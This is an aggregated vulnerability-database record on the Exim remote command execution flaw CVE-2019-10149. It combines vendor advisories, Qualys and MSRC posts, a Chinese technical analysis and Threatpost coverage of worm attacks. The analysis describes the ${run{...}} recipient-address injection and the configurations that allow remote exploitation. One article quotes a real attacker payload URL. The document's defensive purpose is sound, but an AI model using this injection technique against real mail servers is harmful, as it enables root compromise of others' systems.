CVE-2019-10149)](<https://blog.qualys.com/laws-of-vulnerabilities/2019/06/14/exim-mta-vulnerability-the-return-of-the-wizard-cve-2019-10149>)\n\n### Sandworm Attacks\n\nExim MTA vulnerability could be exploited by sending a malicious email to the server, allowing an attacker to run code on the server remotely. 
This vulnerability can lead to Remote Command Injection, and is currently being [actively attacked](<https://www.helpnetsecurity.com/2019/06/14/exploiting-cve-2019-10149/>) in the wild.\n\nNSA mentioned Sandworm actors have been exploiting this vulnerability since at least August 2019. The actors exploited victims using Exim software on their public facing MTAs by sending a command in the \"MAIL FROM\" field of an SMTP (Simple Mail Transfer Protocol) message. Sandworm executed shell script to perform following action on victim's system:\n\n * Add privileged users\n * Disable Network Security settings\n * Update SSH configurations to enable remote access\n * Execute an additional script to enable follow-on exploitation\n\nThe unpatched systems are highly at risk and immediate action should be taken to remediate this vulnerability.\n\n### Detecting CVE-2019-10149\n\nThe best method for identifying vulnerable hosts is through the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) or via authenticated scanning. Qualys released several QIDs for various Linux distros, as well as a generic remote Potential QID (50092) that will identify Exim hosts. You can search for these QIDs in VM Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds:`CVE-2019-10149`_\n\n\n\nIn addition, [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) customers can effectively prioritize this vulnerability as Qualys QID 50092 contains following RTIs (Real-Time Threat Indicators):\n\n * Active Attacks\n * Public Exploit\n * Predicted High Risk\n * Wormable\n\n\nVMDR customers can also stay on top of these threats proactively via the 'live feed' provided for threat prioritization. With 'live feed' updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats.\n\n\n\n### Remediation\n\nCustomers are advised to update Exim immediately by installing version 4.92 or newer to remediate this vulnerability. 
System admins can update respective linux distros using package manager or by downloading the latest version from <https://www.exim.org/mirrors.html>\n\n### Get Started Now\n\nTo start detecting and remediating this vulnerability now, get the [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>).", "modified": "2020-05-29T22:42:14", "published": "2020-05-29T22:42:14", "id": "QUALYSBLOG:1B84DE2D33648D7FDD0B08B1CC1F1AD8", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "NSA Announces Sandworm Actors Exploiting Exim MTA Vulnerability (CVE-2019-10149)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-23T16:02:16", "bulletinFamily": "blog", "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.\n\n"Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and \nmitigation efforts," said the NSA advisory. It also recommended "critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. 
policies, strategies, plans, and competitive advantage."\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) notifying about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information. \n\nHere is a list of 25 publicly known vulnerabilities (CVEs) published by the NSA, along affected products and associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller \nCitrix Gateway \nCitrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193 \nCVE-2020-8195 \nCVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 \nCitrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core & Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Multiple Microsoft Exchange Server| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 
12.2.1.3.0 and 12.2.1.4.0.| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 \nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\n * \n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for "Active Attack" RTI:\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. 
This helps in effectively identifying and tracking this vulnerability.\n\n\n\nWith VMDR Dashboard, you can track 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the ["NSA's Top 25 Vulnerabilities from China" dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n\n\n### **Recommendations**\n\nAs guided by CISA, to protect assets from exploiting, one must do the following:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Vigilance team of an organization should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority commonly exploited vulnerabilities.\n\n### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "modified": "2020-10-22T23:10:29", "published": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": 
"qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2019-07-09T01:32:56", "bulletinFamily": "blog", "cvelist": ["CVE-2019-10149"], "description": "This week, MSRC confirmed the presence of an active Linux worm leveraging a critical Remote Code Execution (RCE) vulnerability, CVE-2019-10149, in Linux Exim email servers running Exim version 4.87 to 4.91. Microsoft Azure infrastructure and Services are not affected; only customer\u2019s Linux IaaS instances running a vulnerable version of Exim are affected. Azure customers running VMs with Exim 4.92 are not \u2026\n\n[ Prevent the impact of a Linux worm by updating Exim (CVE-2019-10149) Read More \u00bb](<https://msrc-blog.microsoft.com/2019/06/14/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/>)", "modified": "2019-06-14T00:27:32", "published": "2019-06-14T00:27:32", "id": "MSRC:31C9A6AB6048DC2F0939A862156094A7", "href": "https://msrc-blog.microsoft.com/2019/06/14/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/", "type": "msrc", "title": "Prevent the impact of a Linux worm by updating Exim (CVE-2019-10149)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-19T01:21:56", "bulletinFamily": "blog", "cvelist": ["CVE-2019-10149"], "description": "This week, MSRC confirmed the presence of an active Linux worm leveraging a critical Remote Code Execution (RCE) vulnerability, [CVE-2019-10149](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>), in Linux Exim email servers running Exim version 4.87 to 4.91. Microsoft Azure infrastructure and Services are not affected; only customer\u2019s Linux IaaS instances running a vulnerable version of Exim are affected. 
Azure customers running VMs with Exim 4.92 are not affected by this vulnerability.\n\nAzure has controls in place to help limit the spread of this worm from work we\u2019ve already done to [combat SPAM](<https://blogs.msdn.microsoft.com/mast/2017/11/15/enhanced-azure-security-for-sending-emails-november-2017-update/>), but customers using the vulnerable software would still be susceptible to infection.\n\nCustomers using [Azure virtual machines (VMs)](<https://azure.microsoft.com/services/virtual-machines/>) are responsible for updating the operating systems running on their VMs. As this vulnerability is being actively exploited by worm activity, MSRC urges customers to observe [Azure security best practices and patterns](<https://docs.microsoft.com/en-us/azure/security/security-best-practices-and-patterns>) and to patch or restrict network access to VMs running the affected versions of Exim.\n\nThere is a partial mitigation for affected systems that can filter or block network traffic via [Network Security Groups (NSGs)](<https://docs.microsoft.com/en-us/azure/virtual-network/security-overview>). The affected systems can mitigate Internet-based \u2018wormable\u2019 malware or advanced malware threats that could exploit the vulnerability. However, affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker\u2019s IP Address is permitted through Network Security Groups. \n\nIt is for these reasons that we strongly advise that all affected systems \u2013 irrespective of whether NSGs are filtering traffic or not \u2013 should be updated as soon as possible. 
\n\n**Resources:**\n\n[Links to Azure Network Security Group Documentation](<https://docs.microsoft.com/en-us/azure/virtual-network/security-overview>) \n[Links to Update Management Solutions using Azure Automation](<https://docs.microsoft.com/en-us/azure/automation/automation-update-management>) \n[Links to Azure Security Best Practices and Patterns](<https://docs.microsoft.com/en-us/azure/security/security-best-practices-and-patterns>)\n\n_JR Aquino \n__Manager, Azure Incident Response \n__Microsoft Security Response Center (MSRC_)\n\n* * *\n\n_updated 18 June 2019 to clarify \"Microsoft Azure infrastructure and Services are not affected; only customer\u2019s Linux IaaS instances running a vulnerable version of Exim are affected.\"_", "modified": "2019-06-15T03:48:55", "published": "2019-06-15T03:48:55", "id": "MSRC:388A48CE67D2E58B0FB4372836DA1089", "href": "https://blogs.technet.microsoft.com/msrc/2019/06/14/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/", "type": "msrc", "title": "Prevent the impact of a Linux worm by updating Exim (CVE-2019-10149)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2019-06-13T15:28:19", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149"], "description": "Security researchers recently found a remote command execution vulnerability in the Exim mail server, tracked as CVE-2019-10149. In the default configuration the vulnerability can be exploited directly by a local attacker, allowing a low-privileged user to execute commands as root. Remote exploitation requires either a non-default configuration or, in the default configuration, keeping a connection to the vulnerable server open for 7 days while sending one byte every few minutes. 
\n360CERT has determined that the vulnerability has a wide impact: it enables local privilege escalation and, in some configurations, remote command execution, so the harm is severe and all users are advised to update promptly. \nLocal exploitation \nThe vulnerable code is in deliver_message(): \n! [](/Article/UploadPic/2019-6/2019613183214133. png) \nnew->address holds the recipient's email address. If the recipient address is of the form ${run{...}}@localhost, the string is passed through expand_string(), which executes the embedded command with root privileges. The call chain is expand_string->child_open->execv \n! [](https://p403.ssl.qhimgs4.com/t01c35b8505c9e6fdd3.jpeg) \n! [](https://p403.ssl.qhimgs4.com/t01d1be03dde4b95bf4.jpeg) \nThe effect of the attack is shown below: \n! [](/Article/UploadPic/2019-6/2019613183214635. png) \nRemote exploitation \n\uff081\uff09default configuration \nWhen the target Exim server uses the default configuration, the attacker must keep a connection to the vulnerable server open for 7 days, sending one byte every few minutes; the exploitation conditions are demanding and the attack is difficult. However, because the Exim code base is very complex, faster exploitation methods may exist. \n\uff082\uff09non-default configuration \nWhen the target server uses any of the following configurations, the attacker can achieve remote command execution: \nA. The administrator has manually removed the verify = recipient ACL; \nB. The administrator has configured Exim to recognise tags in the local part of recipient addresses (the part before the @), for example with local_part_suffix=+* : -*; the attacker can then set RCPT TO to a local user name followed by +${run{...}}@localhost; \nC. The administrator has configured Exim as a secondary MX (Mail eXchange) that forwards mail to a remote domain. In this case the verify = recipient ACL only checks the domain part of the remote address (the part after the @) and does not check the local part. 
The attacker can then set RCPT TO to ${run{...}}@relay_to_domains to exploit the flaw. \n\n0x01 Affected versions \nExim 4.87 through 4.91 are affected. \nVersions before 4.87 are also vulnerable if the EXPERIMENTAL_EVENT option was manually enabled at build time. \n\n0x02 Remediation \nUpdate to the latest version, 4.92, or apply the backported fix from your distribution. \n\n", "edition": 1, "modified": "2019-06-13T00:00:00", "published": "2019-06-13T00:00:00", "id": "MYHACK58:62201994514", "href": "http://www.myhack58.com/Article/html/3/62/2019/94514.htm", "title": "CVE-2019-10149: the Exim remote command execution vulnerability and early warning analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:44:14", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10149"], "description": "It was discovered that Exim incorrectly handled certain decoding \noperations. A remote attacker could possibly use this issue to execute \narbitrary commands.", "edition": 3, "modified": "2019-06-05T00:00:00", "published": "2019-06-05T00:00:00", "id": "USN-4010-1", "href": "https://ubuntu.com/security/notices/USN-4010-1", "title": "Exim vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:37:15", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10149"], "description": "**Issue Overview:**\n\nA flaw was found in Exim versions 4.87 to 4.91 (inclusive); on Amazon Linux, exim packages before release 4.91-1.20 are affected. Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution. ([CVE-2019-10149 __](<https://access.redhat.com/security/cve/CVE-2019-10149>))\n\n \n**Affected Packages:** \n\n\nexim\n\n \n**Issue Correction:** \nRun _yum update exim_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n exim-pgsql-4.91-1.20.amzn1.i686 \n exim-mysql-4.91-1.20.amzn1.i686 \n exim-greylist-4.91-1.20.amzn1.i686 \n exim-debuginfo-4.91-1.20.amzn1.i686 \n exim-mon-4.91-1.20.amzn1.i686 \n exim-4.91-1.20.amzn1.i686 \n \n src: \n exim-4.91-1.20.amzn1.src \n \n x86_64: \n exim-debuginfo-4.91-1.20.amzn1.x86_64 \n exim-pgsql-4.91-1.20.amzn1.x86_64 \n exim-4.91-1.20.amzn1.x86_64 \n exim-greylist-4.91-1.20.amzn1.x86_64 \n exim-mon-4.91-1.20.amzn1.x86_64 \n exim-mysql-4.91-1.20.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2019-06-05T17:12:00", "published": "2019-06-05T17:12:00", "id": "ALAS-2019-1221", "href": "https://alas.aws.amazon.com/ALAS-2019-1221.html", "title": "Critical: exim", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2019-06-07T14:41:43", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10149"], "description": "exim was updated to fix a security issue.\n\n - CVE-2019-10149: Fixed a Remote Command Execution in exim (bsc#1136587)\n\n", "edition": 1, "modified": "2019-06-07T12:14:17", "published": "2019-06-07T12:14:17", "id": "OPENSUSE-SU-2019:1524-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00020.html", "title": "Security update exim (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2020-05-06T22:07:10", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149"], "description": "Microsoft is warning customers that some Azure installations are vulnerable to a recently-disclosed critical Linux Exim mail server flaw that is under active attack.\n\nThe warning comes after a widespread worm campaign was [disclosed on Friday](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>), targeting a flaw in the Exim mail transport agent (MTA), which are Linux-based mail servers that receive, route and deliver email messages from local users and remote hosts. 
However, the issue also plagues Azure users: Linux virtual machines, which run Exim servers, can be created through the Azure portal (a browser-based user interface to create VMs and their associated resources).\n\nIn an advisory, Microsoft said that Azure customers using the vulnerable software (Azure customers running virtual machines that use Exim version 4.87 to 4.91) are susceptible to the attack. Exim version 4.92 is not vulnerable.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCustomers using Azure virtual machines (VMs) are responsible for updating the operating systems running on their VMs,\u201d said JR Aquino, manager for Azure Incident Response at Microsoft Security Response Center, in an [advisory posted over the weekend](<https://blogs.technet.microsoft.com/msrc/2019/06/14/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/>). \u201cAs this vulnerability is being actively exploited by worm activity, [Microsoft] urges customers to observe Azure security best practices and patterns and to patch or restrict network access to VMs running the affected versions of Exim.\u201d\n\nAn attack of vulnerable systems could allow a malicious actor to gain remote command-execution, take control of the victim machines, search the internet for other machines to infect, and to initiate a cryptominer infection.\n\nMicrosoft for its part said that while it offers \u201cpartial mitigation,\u201d vulnerable systems are still impacted if an attacker\u2019s IP address is permitted through Network Security Groups, which is a list of security rules for virtual machines that allow or deny network traffic to resources connected to Azure Virtual Networks.\n\n\u201cThere is a partial mitigation for affected systems that can filter or block network traffic via Network Security Groups (NSGs), its advisory said. 
\u201cThe affected systems can mitigate Internet-based \u2018wormable\u2019 malware or advanced malware threats that could exploit the vulnerability. However, affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker\u2019s IP Address is permitted through Network Security Groups.\u201d\n\nThe flaw stems from improper validation of recipient address in the deliver_message() function in the server. The vulnerability (CVE-2019-10149), which has a critical severity score of 9.8 out of 10 on the CVSS v3 scale, was discovered on [June 5](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) in Exim versions 4.87 to 4.91.\n\nSpecifically under attack is a flaw in Exim-based mail servers, which run almost 57 percent of the internet\u2019s email servers; Researchers said that currently more than 3.5 million servers are at risk from the attacks, which are using a wormable exploit.\n\nThe sheer number of vulnerable systems have researchers, vendors and more urging users to patch every Exim installation in their organization and make sure that it is updated to the most recent version, Exim version 4.92.\n\n\u201cAttackers have started probing for and experimenting with attacks against Exim systems vulnerable to CVE-2019-10149,\u201d Satnam Narang, senior research engineer with Tenable said in an email. \u201cSecurity researchers have observed active exploitation in the wild, one of which includes an attack resulting in permanent root access to vulnerable systems via SSH. It is critically important for those running Exim to upgrade to version 4.92 or apply the backported fix to vulnerable versions in order to prevent these newly discovered attacks from succeeding.\u201d\n\n**_Ransomware is on the rise: _**[**_Don\u2019t miss our free Threatpost webinar _**](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)**_on the ransomware threat landscape, June 19 at 2 p.m. ET. 
_****_Join _****_Threatpost _****_and a panel of experts as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "modified": "2019-06-17T15:02:52", "published": "2019-06-17T15:02:52", "id": "THREATPOST:97FDAC2A1EE34161937EEA7D58123D3D", "href": "https://threatpost.com/microsoft-pushes-azure-users-to-patch-linux-systems/145749/", "type": "threatpost", "title": "Microsoft Pushes Azure Users to Patch Linux Systems", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T21:53:33", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149", "CVE-2019-16928"], "description": "A patch has been issued for a critical flaw in the Exim email server software, which could potentially open Exim-based servers up to denial of service or remote code execution attacks.\n\nExim, which is free software used on Unix-like operating systems (including Linux and macOS), serves as a mail transfer agent that manages mail routing services for organizations. According to a Shodan analysis, Exim is the most used mail transfer agent globally and has over five million internet-facing hosts.\n\nThis specific flaw ([CVE-2019-16928](<https://nvd.nist.gov/vuln/detail/CVE-2019-16928>)) is a heap-based overflow vulnerability. A [heap-based buffer overflow](<https://cwe.mitre.org/data/definitions/122.html>) occurs when more data is written to a buffer (a fixed-size region of memory used to hold data temporarily) than it can hold, and that buffer lives on the heap (the region of a process\u2019s memory used for dynamically allocated data). The excess data overwrites adjacent heap memory and can corrupt other data or allocator metadata, which is what makes such flaws exploitable rather than merely a crash. 
This specific flaw could enable bad actors to crash servers \u2013 and also, as an Exim advisory said, \u201cremote code execution seems to be possible.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAccording to Exim, the flaw lies in the string_vformat() function in string.c, which is reached through the EHLO command handler. An EHLO command is an Extended Simple Mail Transfer Protocol (ESMTP) command sent by a connecting client or mail server to identify itself at the start of an SMTP session, before any email is transferred.\n\n\u201cThe currently known exploit uses an extraordinary long EHLO string to crash the Exim process that is receiving the message.\u201d according to a [Friday advisory](<https://www.exim.org/static/doc/security/CVE-2019-16928.txt>). \u201cWhile at this mode of operation Exim already dropped its privileges, other paths to reach the vulnerable code may exist.\u201d Put differently: the known EHLO trigger is pre-authentication and reachable by any network client, but at that point the receiving process runs unprivileged, so the impact of that particular path is a crash unless another route to string_vformat() with higher privileges is found.\n\nAccording to [VulDB](<https://vuldb.com/?id.142692>), it is possible to exploit the vulnerability remotely. There are known technical details, but no exploit is available, according to the site. Threatpost has reached out to Exim for further details about when the vulnerability was discovered and disclosed.\n\nThe flaw affects Exim versions 4.92 through 4.92.2 (inclusive). A fix has been issued in version 4.92.3. No other mitigations exist other than updating the server, according to Exim\u2019s advisory.\n\n\u201cIf you can\u2019t install the above versions, ask your package maintainer for a version containing the backported fix,\u201d advised Exim. 
\u201cOn request and depending on our resources we will support [customers] in backporting the fix.\u201d\n\nIt\u2019s the second critical Exim vulnerability to be patched this month \u2013 [earlier in September](<https://threatpost.com/critical-exim-flaw-opens-millions-of-servers-to-takeover/148108/>), researchers urged users to upgrade their Exim servers immediately after millions of servers were found to be vulnerable to a critical flaw that could allow a remote, unauthenticated attacker to take full control of them. Another [vulnerability](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>) in June was exploited in a widespread campaign to gain remote command-execution on victims\u2019 Linux systems. Researchers said that for this flaw (CVE-2019-10149) currently more than 3.5 million servers were at risk from [the attacks](<https://threatpost.com/microsoft-pushes-azure-users-to-patch-linux-systems/145749/>), which used a wormable exploit.\n\n**_What are the top cyber security issues associated with privileged account access and credential governance? 
Experts from Thycotic will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree & Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "modified": "2019-09-30T14:12:35", "published": "2019-09-30T14:12:35", "id": "THREATPOST:1E8692DD3729CF2A8B526A85F076513F", "href": "https://threatpost.com/critical-exim-flaw-opens-servers-to-remote-code-execution/148773/", "type": "threatpost", "title": "Critical Exim Flaw Opens Servers to Remote Code Execution", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-19T22:01:51", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149", "CVE-2020-9586"], "description": "A widespread campaign is exploiting a vulnerability in the Exim mail transport agent (MTA) to gain remote command-execution on victims\u2019 Linux systems. Researchers say that currently more than 3.5 million servers are at risk from the attacks, which are using a wormable exploit.\n\nSpecifically under attack is a flaw in Exim-based mail servers, which run almost 57 percent of the internet\u2019s email servers. Attackers are exploiting the flaw, discovered last week, to take control of the victim machines, search the internet for other machines to infect, and to initiate a cryptominer infection.\n\n\u201cThese kinds of attacks have big implications for organizations,\u201d said researchers with Cybereason in a [post on Thursday](<https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability>). 
\u201cThe recovery process from this type of attack is costly and time-consuming.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nExim mail servers are open-source MTAs, which essentially receive, route and deliver email messages from local users and remote hosts. Exim is the default MTA included on some Linux systems.\n\n## The Flaw\n\nThe flaw stems from improper validation of recipient address in the deliver_message() function in the server.\n\nThe vulnerability (CVE-2019-10149), which has a critical severity score of 9.8 out of 10 on the CVSS v3 scale, was discovered on [June 5](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) in Exim versions 4.87 to 4.91. Exim version 4.92 is not vulnerable.\n\n\u201cA patch exists already, is being tested, and backported to all versions we released since (and including) 4.87,\u201d according to a recent [security advisory](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>). \u201cThe severity depends on your configuration. It depends on how close to the standard configuration your Exim runtime configuration is. The closer the better.\u201d\n\nAn initial wave of attacks on this vulnerability \u2013 which involved attackers pushing out exploits from a malicious command-and-control (C2) server \u2013 was first discovered June 9 by researcher [Freddie Leeman.](<https://twitter.com/freddieleeman/status/1137729455181500421>)\n\n\u201cJust detected the first attempts to exploit recent #exim remote command execution (RCE) security flaw (CVE-2019-10149),\u201d he said in a tweet. \u201cTries to downloads a script located at http://173.212.214.137/s (careful). If you run Exim, make sure it\u2019s up-to-date.\u201d\n\n> Just detected the first attempts to exploit recent [#exim](<https://twitter.com/hashtag/exim?src=hash&ref_src=twsrc%5Etfw>) remote command execution (RCE) security flaw (CVE-2019-10149). Tries to downloads a script located at http://173.212.214.137/s (careful). 
If you run Exim, make sure it's up-to-date. [@qualys](<https://twitter.com/qualys?ref_src=twsrc%5Etfw>) [pic.twitter.com/s7veGBcKWO](<https://t.co/s7veGBcKWO>)\n> \n> \u2014 Freddie Leeman (@freddieleeman) [June 9, 2019](<https://twitter.com/freddieleeman/status/1137729455181500421?ref_src=twsrc%5Etfw>)\n\nThen more recently, researchers with Cybereason tracked a second wave of attacks which they believe are launched by a different attacker.\n\n## The Worm Attack\n\nThe more recent and sophisticated campaign, having gained remote command execution through the Exim flaw, first installs an attacker-controlled RSA key as an authorized SSH key for root on the vulnerable server (the key placed on the server is the public half; the attacker keeps the private key), giving it persistent root login independent of the Exim bug. The attacker then deploys a port scanner to sniff out other vulnerable servers and installs a coin-miner. Defenders should therefore check root\u2019s SSH authorized keys on any exposed Exim host, not just the Exim version.\n\nIn addition, the campaign appears to be \u201chighly pervasive\u201d with extra measures \u2013 such as installing several payloads at different stages including the port scanner and coin-miner \u2013 for persistence on the infected system.\n\n\u201cIt is clear that the attackers went to great lengths to try to hide the intentions of their newly-created worm,\u201d researchers said. 
